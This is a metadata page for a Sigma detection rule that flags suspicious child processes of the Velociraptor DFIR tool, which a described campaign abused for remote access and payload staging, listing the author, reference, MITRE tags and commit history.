Suspicious Velociraptor Child Process

Rule Info

Name
Suspicious Velociraptor Child Process
Author
Swachchhanda Shrawan Poudel (Nextron Systems)
Description
Detects the suspicious use of the Velociraptor DFIR tool to execute other tools or download additional payloads, as seen in a campaign where it was abused for remote access and to stage further attacks.
Reference
https://news.sophos.com/en-us/2025/08/26/velociraptor-incident-response-tool-abused-for-remote-access/
Date
2025-08-29 00:00:00
Modified
None
Id
4bc90587-e6ca-4b41-be0b-ed4d04e4ed0c
Tags
attack.persistence attack.defense-evasion attack.t1219
Type
Community Rule
Link to Public Repo
https://github.com/SigmaHQ/sigma/search?q=4bc90587-e6ca-4b41-be0b-ed4d04e4ed0c

Rule History

Author
Title
Date
Commit
Swachchhanda Shrawan Poudel
Merge PR #5635 from @swachchhanda000 - velociraptor abusing vscode tunneling
2025-09-22
fe015f3c2
THOR Logo  Scan your endpoints, forensic images or collected files with our portable scanner THOR
  Warning: Access to VALHALLA is rate-limited - once you prove unworthy, access gets denied
  Nextron Systems 2022